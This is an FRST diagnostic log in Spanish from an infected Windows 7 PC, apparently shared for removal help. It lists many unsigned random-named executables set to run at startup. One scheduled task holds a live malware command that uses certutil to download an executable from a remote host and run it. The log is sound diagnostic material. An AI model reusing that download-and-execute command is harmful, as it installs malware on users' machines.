Resultado del análisis realizado por Farbar Recovery Scan Tool (FRST) (x64) Versión: 27-01-2020
Ejecutado por MrEidrian (administrador) sobre BANWORD (Gigabyte Technology Co., Ltd. P55A-UD4) (31-01-2020 11:11:03)
Ejecutado desde C:\Users\MrEidrian\Desktop
Perfiles cargados: MrEidrian (Perfiles disponibles: MrEidrian & Noelia)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Idioma: Español (España, internacional)
Internet Explorer Versión 8 (Navegador predeterminado: Chrome)
Modo de Inicio: Normal
Tutorial para Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Procesos (Lista blanca) =================
(Si una entrada es incluida en el fixlist, el proceso será cerrado. El archivo no será movido.)
( ) [Archivo no firmado] C:\ProgramData\EventSvc\work0.exe
( ) [Archivo no firmado] C:\ProgramData\NtvHost\native.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\2j3xhwl5gqf\0xyemshxszc.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\4plii4obowa\vkfgpve1kmf.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\a5cqdmrbe54\pvtkqi5q5e2.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\dia1nwsj1y1\251zwfb1una.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\frr3pwvyetd\sqhrsfjrtyk.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\g2dncbivjiz\sbatxjutel4.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\hi4mbly3ii3\xpvfw24cqky.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\kdua1jfo123\vvegzej4wy2.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\mprw3ktcc2k\emdwzefyk2y.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\n0pczckdhog\i4loeahzfup.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\uhnrjry4bdn\jujerzwizaa.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\vfbtqr24hkh\oswlgg15f1h.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\vntlutefrev\30rwyhw2iwt.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\x4sjscyv4hq\0pbpdqr0a5k.exe
() [Archivo no firmado] C:\Program Files (x86)\TVRadio\radiotvap.exe
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\3jl4s2k53rn\SRBhd0G8wx=.exe
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-007J5.tmp\oswlgg15f1h.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-1801B.tmp\251zwfb1una.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-27APO.tmp\emdwzefyk2y.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-3RUQC.tmp\0pbpdqr0a5k.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-AGTBR.tmp\xpvfw24cqky.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-GHA5E.tmp\0xyemshxszc.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-HQODJ.tmp\sbatxjutel4.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-I1NTH.tmp\sqhrsfjrtyk.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-I2K7L.tmp\30rwyhw2iwt.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-I4PTQ.tmp\vkfgpve1kmf.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-LVUEI.tmp\pvtkqi5q5e2.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-QLBVR.tmp\vvegzej4wy2.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-SDRGI.tmp\jujerzwizaa.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-T0S8A.tmp\i4loeahzfup.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\yhjfhl3s13b\Processlasso.exe
() [Archivo no firmado] C:\Windows\SearchIndexer.exe
() [Archivo no firmado] C:\Windows\SearchIndexer.exe
(5) [Archivo no firmado] C:\Program Files\0OP808P0KJ\IGQIGKLAV.exe
(5) [Archivo no firmado] C:\Program Files\6S3KYHHWIU\6S3KYHHWI.exe
(5) [Archivo no firmado] C:\Program Files\85E8BNNBEE\85E8BNNBE.exe
(5) [Archivo no firmado] C:\Program Files\9B24IF9AQM\9B24IF9AQ.exe
(5) [Archivo no firmado] C:\Program Files\ERTC7W5OYX\ERTC7W5OY.exe
(5) [Archivo no firmado] C:\Program Files\KHJ98BRLDV\U5XXOJRBU.exe
(5) [Archivo no firmado] C:\Program Files\NPUOW5G9P5\NPUOW5G9P.exe
(5) [Archivo no firmado] C:\Program Files\U24HP4O5BP\U24HP4O5B.exe
(5) [Archivo no firmado] C:\Program Files\U5EES31B4Q\8CRMSAUET.exe
(5) [Archivo no firmado] C:\Program Files\WAK3MKKWFC\WAK3MKKWF.exe
(5) [Archivo no firmado] C:\Program Files\YUGF9ZIQK7\YUGF9ZIQK.exe
(5) [Archivo no firmado] C:\Program Files\ZWD63K22V7\ZWD63K22V.exe
(ACD Systems International Inc -> ACD Systems) E:\Archivos de Programa\ACDSeePro5\ACDSee Pro\5.0\ACDSeeProInTouch2.exe
(Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe
(Advanced Micro Devices Inc.) [Archivo no firmado] C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(AN045KE6) [Archivo no firmado] C:\Program Files\AUXDGUNQ0L\AUXDGUNQ0.exe
(AN045KE6) [Archivo no firmado] C:\Program Files\NJ4SOTTRZH\NJ4SOTTRZ.exe
(Anomie4) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\St3mqofQ.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc. -> Apple Inc.) E:\Archivos de Programa\iTunes\iTunesHelper.exe
(ATI Technologies Inc.) [Archivo no firmado] C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Box, Inc.) [Archivo no firmado] C:\Program Files\Box Sync\BoxSyncHelper.exe
(CloudBees, Inc.) [Archivo no firmado] C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
(CloudBees, Inc.) [Archivo no firmado] C:\ProgramData\EventSvc\eventsvc.exe
(EnigmaSoft Limited -> EnigmaSoft Limited) C:\Program Files\EnigmaSoft\SpyHunter\ShKernel.exe
(EnigmaSoft Limited -> EnigmaSoft Limited) C:\Program Files\EnigmaSoft\SpyHunter\ShMonitor.exe
(EnigmaSoft Limited -> EnigmaSoft Limited) C:\Program Files\EnigmaSoft\SpyHunter\SpyHunter5.exe
(Even Balance, Inc. -> ) C:\Windows\SysWOW64\PnkBstrA.exe
(EVERNOTE CORPORATION -> Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) [Archivo no firmado] C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe
(FlyStreets) [Archivo no firmado] C:\Program Files (x86)\Yhanj\25388233.exe
(FlyStreets) [Archivo no firmado] C:\Program Files (x86)\Yhanj\679940659.exe
(Gelbe vom Ei GmbH -> ) C:\Windows\trustedlogos\TrustedLogos.exe
(Google LLC -> ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\1548926207.exe
(Google LLC -> Google LLC) C:\Users\MrEidrian\AppData\Local\GoogleChromeApplication\chrome.exe
(Google LLC -> Google LLC) C:\Users\MrEidrian\AppData\Local\GoogleChromeApplication\chrome.exe
(Google LLC -> Google LLC) C:\Users\MrEidrian\AppData\Local\GoogleChromeApplication\chrome.exe
(Google LLC -> Google LLC) C:\Users\MrEidrian\AppData\Local\GoogleChromeApplication\chrome.exe
(Google LLC -> Google LLC) C:\Users\MrEidrian\AppData\Local\GoogleChromeApplication\chrome.exe
(Google LLC -> Google LLC) C:\Users\MrEidrian\AppData\Local\GoogleChromeApplication\chrome.exe
(Google LLC -> Google LLC) C:\Users\MrEidrian\AppData\Local\GoogleChromeApplication\chrome.exe
(Google LLC -> Google) C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\SwReporter\44.215.200.3\software_reporter_tool.exe
(Google LLC -> Google) C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\SwReporter\44.215.200.3\software_reporter_tool.exe
(Google LLC -> Google) C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\SwReporter\44.215.200.3\software_reporter_tool.exe
(Google LLC -> Google) C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\SwReporter\44.215.200.3\software_reporter_tool.exe
(GoPro) [Archivo no firmado] C:\Program Files (x86)\CineForm\Tools\GoProCineFormStatusViewer.exe
(Huawei Technologies Co., Ltd. -> ) [Archivo no firmado] C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe
(Logitech -> Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDClock.exe
(Logitech -> Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDCountdown.exe
(Logitech -> Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDMedia.exe
(Logitech -> Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDPOP3.exe
(Logitech -> Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDRSS.exe
(Logitech -> Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
(Mega Limited -> Mega Limited) C:\ProgramData\MEGAsync\MEGAsync.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wisptis.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wisptis.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Windows Hardware Compatibility Publisher -> AMD) C:\Windows\System32\atieclxx.exe
(Microsoft Windows Hardware Compatibility Publisher -> AMD) C:\Windows\System32\atiesrxx.exe
(Nero AG -> Nero AG) C:\Program Files (x86)\Common Files\Ahead\Lib\NMBgMonitor.exe
(Nero AG -> Nero AG) C:\Program Files (x86)\Common Files\Ahead\Lib\NMIndexingService.exe
(Nero AG -> Nero AG) C:\Program Files (x86)\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
(Nitro Software, Inc. -> ) E:\Pro11\Nitro_UpdateService.exe
(Nitro Software, Inc. -> Nalpeiron Ltd.) C:\Windows\SysWOW64\NLSSRV32.EXE
(Nitro Software, Inc. -> Nitro Software, Inc.) E:\Pro11\NitroPDFDriverService11x64.exe
(Nullsoft, Inc.) [Archivo no firmado] C:\Program Files (x86)\Winamp\winampa.exe
(Numedia Soft, Inc. -> ) C:\Windows\SysWOW64\NMSAccess64.exe
(Piriform Software Ltd -> Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Samsung Electronics CO., LTD. -> DEVGURU Co., LTD.) C:\Program Files\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION) C:\ProgramData\EPSON\EPW!3 SSRP\E_S40RPB.EXE
(TeamViewer GmbH -> TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(TRAENGERB) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-I758J.tmp\lshost.exe
(TRAENGERB) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-IDB8M.tmp\lshost.exe
(Wacom Technology Corp. -> Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TouchService.exe
(Wacom Technology Corp. -> Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TouchUser.exe
==================== Registro (Lista blanca) ===================
(Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado. El archivo no será movido.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12503184 2012-06-11] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [7468784 2013-02-28] (Logitech -> Logitech Inc.)
HKLM\...\Run: [BoxSyncHelper] => C:\Program Files\Box Sync\BoxSyncHelper.exe [393216 2013-06-07] (Box, Inc.) [Archivo no firmado]
HKLM\...\Run: [iTunesHelper] => E:\Archivos de Programa\iTunes\iTunesHelper.exe [302904 2019-05-07] (Apple Inc. -> Apple Inc.)
HKLM-x32\...\Run: [WinampAgent] => C:\Program Files (x86)\Winamp\winampa.exe [74752 2012-06-20] (Nullsoft, Inc.) [Archivo no firmado]
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Test Signing Certificate -> Adobe Systems Incorporated) [Archivo no firmado]
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [76600 2019-05-03] (Apple Inc. -> Apple Inc.)
HKLM-x32\...\Run: [ACPW05EN] => E:\Archivos de Programa\ACDSeePro5\ACDSee Pro\5.0\ACDSeeProInTouch2.exe [822384 2011-09-20] (ACD Systems International Inc -> ACD Systems)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [766208 2013-08-30] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
HKLM\...\RunOnce: [wzq2q1j2xzy] => C:\Program Files (x86)\Yhanj\679940659.exe [485888 2019-08-31] (FlyStreets) [Archivo no firmado]
HKLM\...\RunOnce: [0e52wlmipja] => C:\Program Files (x86)\Yhanj\25388233.exe [485888 2019-08-31] (FlyStreets) [Archivo no firmado]
HKU\S-1-5-19\...\Run: [Sidebar] => %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun
HKU\S-1-5-20\...\Run: [Sidebar] => %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [DAEMON Tools Lite] => C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe [3672384 2012-04-11] (DT Soft Ltd -> DT Soft Ltd)
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] => C:\Program Files (x86)\Common Files\Ahead\Lib\NMBgMonitor.exe [152872 2007-06-27] (Nero AG -> Nero AG)
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [24552064 2020-01-17] (Piriform Software Ltd -> Piriform Ltd)
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [GDHV8HQ09I0MW20] => C:\Program Files\KHJ98BRLDV\U5XXOJRBU.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [DUJBOJYM2QES8U3] => C:\Program Files\0OP808P0KJ\IGQIGKLAV.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [7543004] => C:\Users\MrEidrian\AppData\Roaming\frr3pwvyetd\sqhrsfjrtyk.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [1714324] => C:\Users\MrEidrian\AppData\Roaming\dia1nwsj1y1\251zwfb1una.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [HQHN7D6DKMX5F12] => C:\Program Files\WAK3MKKWFC\WAK3MKKWF.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [OD8V24UG04MY8H6] => C:\Program Files\YUGF9ZIQK7\YUGF9ZIQK.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [4692347] => C:\Users\MrEidrian\AppData\Roaming\n0pczckdhog\i4loeahzfup.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [6172493] => C:\Users\MrEidrian\AppData\Roaming\a5cqdmrbe54\pvtkqi5q5e2.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [QJXDKB3T0NBCZUM] => C:\Program Files\9B24IF9AQM\9B24IF9AQ.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [GXB70AFVZGVBZI1] => C:\Program Files\6S3KYHHWIU\6S3KYHHWI.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [4803196] => C:\Users\MrEidrian\AppData\Roaming\g2dncbivjiz\sbatxjutel4.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [7438577] => C:\Users\MrEidrian\AppData\Roaming\kdua1jfo123\vvegzej4wy2.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [88YLCFXRTWHOKTL] => C:\Program Files\ERTC7W5OYX\ERTC7W5OY.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [1387278] => C:\Users\MrEidrian\AppData\Roaming\mprw3ktcc2k\emdwzefyk2y.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [8525450] => C:\Users\MrEidrian\AppData\Roaming\hi4mbly3ii3\xpvfw24cqky.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [GFM4VKKOD8QYWVS] => C:\Program Files\U24HP4O5BP\U24HP4O5B.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [249KMWAKWKTT3J9] => C:\Program Files\NPUOW5G9P5\NPUOW5G9P.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [8R0SHNZNB2ILWZC] => C:\Program Files\ZWD63K22V7\ZWD63K22V.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [5972726] => C:\Users\MrEidrian\AppData\Roaming\4plii4obowa\vkfgpve1kmf.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [964528] => C:\Users\MrEidrian\AppData\Roaming\2j3xhwl5gqf\0xyemshxszc.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [VM227E5VN1KEOF3] => C:\Program Files\85E8BNNBEE\85E8BNNBE.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [HK4FKEDFGACN422] => C:\Program Files\U5EES31B4Q\8CRMSAUET.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [8825304] => C:\Users\MrEidrian\AppData\Roaming\x4sjscyv4hq\0pbpdqr0a5k.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [5910964] => C:\Users\MrEidrian\AppData\Roaming\uhnrjry4bdn\jujerzwizaa.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [ZSBC9OI36Z15QG5] => C:\Program Files\NJ4SOTTRZH\NJ4SOTTRZ.exe [1004544 2020-01-31] (AN045KE6) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [6851699] => C:\Users\MrEidrian\AppData\Roaming\vntlutefrev\30rwyhw2iwt.exe [1042615 2020-01-31] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [5200897] => C:\Users\MrEidrian\AppData\Roaming\vfbtqr24hkh\oswlgg15f1h.exe [1042615 2020-01-31] ( ) [Archivo no firmado]
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\76.0.3809.132\Installer\chrmstp.exe [2019-09-01] (Google LLC -> Google LLC)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
HKLM\Software\...\Authentication\Credential Providers: [{F8A0B131-5F68-486c-8040-7E8FC3C85BB6}] -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDCREDPROV.DLL [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CineForm Status.lnk [2013-09-22]
ShortcutTarget: CineForm Status.lnk -> C:\Program Files (x86)\CineForm\Tools\GoProCineFormStatusViewer.exe (GoPro) [Archivo no firmado]
Startup: C:\Users\MrEidrian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EvernoteClipper.lnk [2013-06-09]
ShortcutTarget: EvernoteClipper.lnk -> C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe (EVERNOTE CORPORATION -> Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) [Archivo no firmado]
Startup: C:\Users\MrEidrian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2018-01-20]
ShortcutTarget: MEGAsync.lnk -> C:\ProgramData\MEGAsync\MEGAsync.exe (Mega Limited -> Mega Limited)
==================== Tareas programadas (Lista blanca) ============
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
Task: {0083E528-8926-47CE-91D9-92F6EA2DE595} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [360448 2020-01-17] (CloudBees, Inc.) [Archivo no firmado]
Task: {10A13A2F-DFDC-42A4-8AAA-AB2806A12AE0} - System32\Tasks\{7DF45B6D-4599-459D-9B29-9015D1FFC05C} => C:\Windows\system32\pcalua.exe -a "E:\Archivos de Programa\DNI\CPin\_uninst\uninstaller.exe"
Task: {1DD6BF40-1D14-4D5F-AE7A-4B54E8364AA7} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [18458752 2020-01-17] (Piriform Software Ltd -> Piriform Ltd)
Task: {1F61FFE7-7027-4558-A257-516CA746C8C4} - System32\Tasks\MEGA\MEGAsync Update Task S-1-5-21-3862230028-3041123482-801023079-1000 => C:\ProgramData\MEGAsync\MEGAupdater.exe [615160 2020-01-17] (Mega Limited -> Mega Limited)
Task: {4A162AA3-469C-4D9E-A12C-2B0C30E8BBAD} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_238_pepper.exe [1452600 2019-08-14] (Adobe Inc. -> Adobe)
Task: {6FCCE8D2-CFB0-40BA-AB28-85C2EC41B36F} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [616320 2018-01-08] (Apple Inc. -> Apple Inc.)
Task: {74B6A54F-133A-4237-970B-54D16592BBED} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-01-17] (Adobe Inc. -> Adobe)
Task: {75A8EB91-7924-4CA3-871B-3F4954BAA4DD} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_238_Plugin.exe [1457208 2019-08-14] (Adobe Inc. -> Adobe)
Task: {76A23E0D-57BB-48F8-AD0B-66459606DC5D} - System32\Tasks\{A36708C4-9827-440F-94F4-EDD4E0E2D281} => C:\Windows\system32\pcalua.exe -a E:\Juegos\Steam\steam.exe -c steam://uninstall/17080
Task: {974172EE-5163-4B5F-9937-43C67070C014} - System32\Tasks\{FB348B64-F140-4DBE-9F28-F283B92EFEF3} => C:\Windows\system32\pcalua.exe -a "C:\Program Files\AVAST Software\Avast\aswRunDll.exe" -c "C:\Program Files\AVAST Software\Avast\Setup\setiface.dll" RunSetup
Task: {982453F1-781B-4DC2-978D-E90DCE055325} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [608384 2020-01-17] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {CFED4984-1DA7-4F67-8A7F-BA086BB4B105} - System32\Tasks\AdobeAAMUpdater-1.0-BANWORD-MrEidrian => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
Task: {DE0E33E3-8A41-451E-A4B7-B84AF703FF42} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://bigtext.club/app/app.exe C:\Users\MrEidrian\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\MrEidrian\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATENCIÓN
Task: {FAA6E360-A72B-4E5F-87ED-CA34E8E5D5D2} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [360448 2020-01-17] (CloudBees, Inc.) [Archivo no firmado]
Task: {FE1F2474-75FA-455D-B9C1-8ECFDCC669D4} - System32\Tasks\Opera scheduled Autoupdate 1380006602 => E:\Archivos de Programa\Opera\launcher.exe [1346584 2019-12-19] (Opera Software AS -> Opera Software)
(Si una entrada es incluida en el fixlist, el archivo de tarea (.job) será movido. El archivo que está siendo ejecutado por la tarea no será movido.)
==================== Internet (Lista blanca) ====================
(Si un elemento es incluido en el fixlist, y éste pertenece al registro, será eliminado o restaurado a su valor predeterminado.)
ProxyEnable: [S-1-5-21-3862230028-3041123482-801023079-1000] => Proxy está habilitado.
ProxyServer: [S-1-5-21-3862230028-3041123482-801023079-1000] => 127.0.0.1:8003
Winsock: Catalog5 07 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145648 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5 08 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145648 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5 09 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 07 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171760 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 08 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171760 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 09 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
